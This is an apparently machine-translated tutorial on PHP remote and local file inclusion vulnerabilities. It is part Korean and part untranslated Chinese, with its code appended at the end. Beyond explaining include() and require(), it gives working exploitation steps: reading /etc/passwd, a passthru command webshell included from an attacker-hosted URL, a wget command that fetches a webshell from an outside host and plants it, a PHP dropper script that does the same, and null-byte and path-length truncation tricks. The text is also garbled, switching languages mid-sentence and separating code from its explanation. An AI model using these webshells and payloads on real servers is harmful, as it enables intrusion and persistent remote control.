1. "원격 파일 포함 취약점"이란 무엇입니까?
정답은
서버가 PHP 기능(함수)을 사용하여 임의의 파일을 포함할 경우, 포함되는 파일의 소스를 엄격하게 필터링하지 않기 때문에 악성 파일을 포함할 수 있으며, 그리고 우리는 이 악성 파일을 사악한 목적으로 사용할 수 있습니다.
관련된 위험한 함수: include(), require() 및 include_once(), require_once()
Include: 지정된 파일을 포함하고 실행합니다. 외부 파일을 포함할 때 오류가 발생하면 시스템에서 경고. 그러나 전체 PHP 파일은 계속 실행됩니다.
Require: include와의 유일한 차이점은 오류가 발생하면 include는 계속 실행되지만 require 실행은 중지된다는 점입니다.
Include_once: 이 함수는 함수를 가져오기 전에 파일을 가져왔는지 확인한다는 점을 제외하면 include 함수와 거의 동일한 효과를 갖습니다. 한 번 실행한 경우에는 다시 실행되지 않습니다.
Require_once: 이 함수와 require의 차이점은 위에서 언급한 include 및 include_once와 같습니다. 그래서 반복하지 않겠습니다.
php.ini 구성 파일:allow_url_fopen=off는 원격 파일을 포함할 수 없음을 의미합니다. Php4는 원격 및 로컬에 존재하고, php5는 로컬 포함에만 존재합니다.
2. 파일을 포함하는 이유는 무엇인가요?
프로그래머는 프로그램을 작성할 때 동일한 작업을 수행하는 것을 좋아하지 않으며 동일한 코드(예: 일부 공통 함수)를 여러 번 작성하는 것을 좋아하지 않으므로 공유해야 할 코드를 작성합니다. share.php와 같은 별도의 파일을 만든 다음 다른 파일에 포함 호출을 수행합니다. PHP에서는 이 목적을 달성하기 위해 위에 나열된 함수를 사용합니다. 작업 흐름: main.php에 share.php를 포함하려면 다음과 같이 include("share.php")를 작성합니다. 목적이 달성된 다음입니다. share.php에 있는 함수를 사용할 수 있습니다. 포함해야 할 파일 이름을 하드 코딩하는 데 문제가 없으며 허점도 없습니다. 그렇다면 문제는 무엇입니까?
때때로 어떤 파일을 포함해야 할지 확신할 수 없을 수도 있습니다. 예를 들어 다음 index.php 파일의 코드를 살펴보겠습니다.
if ($_GET[page]) { include $_GET[page]; } else { include ”home.php”; }
매우 일반적인 PHP 코드는 어떻게 작동하나요?
위 코드의 사용 형식은 다음과 같습니다.
http://www.php.cn/m4r10/php/index.php?page=main.php
또는
http://www .php.cn/m4r10/php/index.php?page=downloads.php
위 코드와 결합하여 작동 방식에 대해 간략하게 설명하겠습니다.
위 URL을 제출하고 index.php에 페이지를 가져옵니다. 값($_GET[페이지]).
$_GET[page]가 비어 있는지 확인하세요. 비어 있지 않으면(여기는 main.php입니다), include를 사용하여 이 파일을 포함하세요.
$_GET[page]가 비어 있으면 else를 실행하여 “home.php” 파일을 포함시킵니다.
3. 허점은 왜 발생하나요?
이것이 훌륭하다고 말할 수도 있습니다. URL에 따라 파일을 동적으로 포함할 수 있어 얼마나 편리합니까? 질문에 대한 대답은 다음과 같습니다. 우리는 영리하지 않습니다. 우리는 항상 다른 사람과 다르기를 원하며 그의 링크를 따르지 않을 것입니다. 우리는 포함(호출)하려는 파일을 작성하고 싶을 수도 있습니다. 예를 들어 다음과 같이 입력합니다. 다음 URL을 아무렇게나 :http://hi.baidu.com/m4r10/php/index.php?page=hello.php. 그런 다음 index.php 프로그램은 위에서 언급한 단계를 어리석게 따릅니다. 페이지를 hello.php로 가져온 다음 include(hello.php)로 이동합니다. 이때 문제는 hello.php 파일이 없기 때문에 발생합니다. . 가 포함되어 있으면 다음 메시지와 유사한 경고를 보고합니다:
Warning: include(hello.php) [function.include]: failed to open stream: No such file or directory in /vhost/wwwroot/php/index.php on line 3 Warning: include() [function.include]: Failed opening ’hello.php’ for inclusion (include_path=’.:’) in /vhost/wwwroot/php/index.php on line 3
위의 경고는 우리가 지정한 hello.php 파일, 즉 우리가 지정한 경로를 포함하지 않는 파일을 찾을 수 없습니다. 및 다음 경고 지정된 파일이 이전에 발견되지 않았기 때문에 해당 파일이 포함될 때 경고가 발행되었습니다.
4. 어떻게 사용하나요?
위에서 볼 수 있듯이 문제가 발생했는데 이러한 취약점을 어떻게 악용합니까? 실제로 악용 방법은 많지만 여기서는 세 가지 일반적인 악용 방법을 언급하겠습니다.
1 .대상 컴퓨터에서 다른 파일을 읽는 것을 포함합니다由前面我们可以看到,由于对取得的参数page没有过滤,于是我们可以任意指定目标主机上的其它敏感文件,例如在前面的警告中,我们可以看到暴露的绝对路径(vhost/wwwroot/php/),那么我们就可以多次探测来包含其它文件,比如指定URL为:http://hi.baidu.com /m4r10/php/index.php?page=./txt.txt可以读出当前路径下的txt.txt文件,也可以使用../../进行目录跳转 (在没过滤../的情况下);也可以直接指定绝对路径,读取敏感的系统文件,比如这个URL:http://hi.baidu.com/m4r10 /php/index.php?page=/etc/passwd,如果目标主机没有对权限限制的很严格,或者启动Apache的权限比较高,是可以读出 这个文件内容的。否则就会得到一个类似于:open_basedir restriction in effect.的Warning(这里是由于apache的open_basedir中限制了访问目录)。 2.远程文件包含可运行的PHP木马 如果目标主机的”allow_url_fopen”是激活的(默认是激活的,没几个人会修改),我们就可以有更大的利用空间,我们可以指定其它 URL上的一个包含PHP代码的webshell来直接运行,比如,我先写一段运行命令的PHP代码,如下保存为cmd.txt(后缀不重要,只要内容为 PHP格式就可以了)。 以上这个文件的作用就是接受cmd指定的命令,并调用passthru函数执行,把内容返回在M4R10开始行与M4R10结束行之间。把这个文件 保存到我们主机的服务器上(可以是不支持PHP的主机),只要能通过HTTP访问到就可以了,例如地址如下:http://www.xxx.cn/cmd.txt,然后我们就可以在那个漏洞主机上构造如下URL来利用了: http://www.php.cn/m4r10/php /index.php?page=http://www.xxx.cn/cmd.txt?cmd=ls 其中cmd后面的就是你需要执行的命令,其它常 用的命令(以*UNIX为例)如下: ll 列目录、文件(相当于Windows下dir) pwd 查看当前绝对路径 id whoami 查看当前用户 wget 下载指定URL的文件 等等其它的,你主机去BAIDU找吧,就不列举了。 3.包含一个创建文件的PHP文件(常用) 也许有的人认为还是得到目标机上的一个真实的Webshell比较放心,万一哪天人家发现这儿个包含漏洞修补了,我们就不能再远程包含得到上面的那 个” 伪”Webshell了,不是么?可以理解这个心态,我们继续。得到一个真实的Webshell,我们也说两种常见的方法: 1)使用wget之类的命令来下载一个Webshell 这个比较简单,也很常用,在上面我们得到的那个伪webshell中,我们可以执行命令,那么我们也可以调用系统中的一个很厉害的角色,wget, 这个命令的强大你可以google下,参数一大堆,绝对搞晕你,呵呵,我们不需要那么复杂,我们就使用一个 -O(–output- document=FILE,把文档写到FILE文件中) 就可以了,呵呵。 前提是你在按照前面的步骤放一个包含PHP代码的Webshell在一个可以通过HTTP或者FTP等可以访问的地方,比 如:http://www.xxx.cn/m4r10.txt,这个文件里写的就是Webshell的内容。然后我们在前面得到的伪 Webshell中 执行如下的URL: http://www.php.cn/m4r10/php/index.php?page=http://www.xxx.cn /cmd.txt?cmd=wget http://www.xxx.cn/m4r10.txt -O m4r10.php 如果当前目录可写,就能得到 一个叫做m4r10.php的Webshell了,如果当前目录不可写,还需要想其它的办法。 2)使用文件来创建 前面的wget可能会遇到当前目录不能写的情况;或者目标主机禁用了(或者没装)这个命令,我们又需要变通一下了,我们可以结合前面的包含文件漏洞来包含一个创建文件(写文件)的PHP脚本,内容如下: 还是写入我们上面用wget下载的那个php文件,但是我们改进了方法,用PHP脚本来实现,可以使用上面的cmd.php?cmd=ll查找可以 写的目录,比如这里的upload,然后把文件创建在这个目录下:./upload/m4r10.php。然后就得到我们的Webshell了。 4.本地文件包含(常用) 典型的漏洞代码: 黑盒判断方法: 单纯的从URL判断的话,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞。 本地包含漏洞的利用(这里先忽略截断问题,下面会将截断的方法) 1、包含同服务器中上传的jpg、txt、rar等文件,这个是最理想的情况了。 2、包含系统的各种日志,如apache日志,文件系统日志等 其中apache当记录格式为combined,一般日志都会很大,基本无法包含成功。包含log是有自动化攻击程序的。 突破限制截断后面的字符串技巧 利用本地包含时常常需要用%00来截断后面的字符串,但在GPC为ON时%00是会被转义的,那么还有其他方法么? 用一定数量的/突破操作系统对文件名的长度限制来截断后面的字符串(推测相对路径可用) 看漏洞代码: test.txt 代码 结果截断失败,改下代码: 这次成功。 以上是windows下的方法,其实linux也可以: include截断 提交“action=/etc/passwd%00”中的“%00”将截断后面的“.php”,但是除了“%00”还有没有其他的字符可以实现截断使用呢? 肯定有人想到了远程包含的url里问号“?”的作用,通过提交“action=http://www.hacksite.com/evil-code.txt?”这里“?”实现了“伪截断”:),好象这个看上去不是那么舒服那么我们简单写个代码fuzz一下: 经过测试字符“.”、“ /”或者2个字符的组合,在一定的长度时将被截断,win系统和*nix的系统长度不一样,当win下strlen(realpath("./"))+strlen($_GET['action'])的长度大于256时被截断,对于*nix的长度是4 * 1024 = 4096。对于php.ini里设置远程文件关闭的时候就可以利用上面的技巧包含本地文件了。(此漏洞由cloie#ph4nt0m.org最先发现]) 推荐文章: 关于PHP文件包含一些漏洞分析。文章简单的分析了在php文件包含时inlcude的一个漏洞分析,下面希望对大家有点用处哦。 위 내용은 PHP 파일에는 자세한 설명이 포함되어 있습니다.의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!<?php
if (get_magic_quotes_gpc()){
$_REQUEST["cmd"]=stripslashes($_REQUEST["cmd"]);} //去掉转义字符(可去掉字符串中的反斜线字符)
ini_set(“max_execution_time”,0); //设定针对这个文件的执行时间,0为不限制.
echo ”M4R10开始行”; //打印的返回的开始行提示信息
passthru($_REQUEST["cmd"]); //运行cmd指定的命令
echo ”M4R10结束行”; //打印的返回的结束行提示信息
?>
<?php
$f=file_get_contents(“http://www.xxx.cn/m4r10.txt”); //打开指定路径的文件流
$ff=fopen(“./upload/m4r10.php”,”a”); //寻找一个可以的目录,创建一个文件
fwrite ($ff,$f); //把前面打开的文件流写到创建的文件里
fclose($ff); //关闭保存文件
?>
<?php
include($_GET['pages'].‘.php’);
?>
<?php
$webpath = dirname(__FILE__)."/";
$filepath = "test.txt";
for($i =1;$i<1000;$i++){
$filepath .= '.';
}
include $webpath.$filepath.".php";
?>
<?php
$webpath = dirname(__FILE__)."/";
$filepath = "test.txt";
for($i =1;$i<1000;$i++){
$filepath .= '.';
}
include $filepath.".php"; //相对路径
?>
<?php
include $_GET['action'].".php";
?>
////var5.php代码:
////include $_GET['action'].".php";
////print strlen(realpath("./"))+strlen($_GET['action']);
///////////////////
ini_set('max_execution_time', 0);
$str='';
for($i=0;$i<50000;$i++)
{
$str=$str."/";
$resp=file_get_contents('http://127.0.0.1/var/var5.php?action=1.txt'.$str);
//1.txt里的代码为print 'hi';
if (strpos($resp, 'hi') !== false){
print $i;
exit;
}
}
?>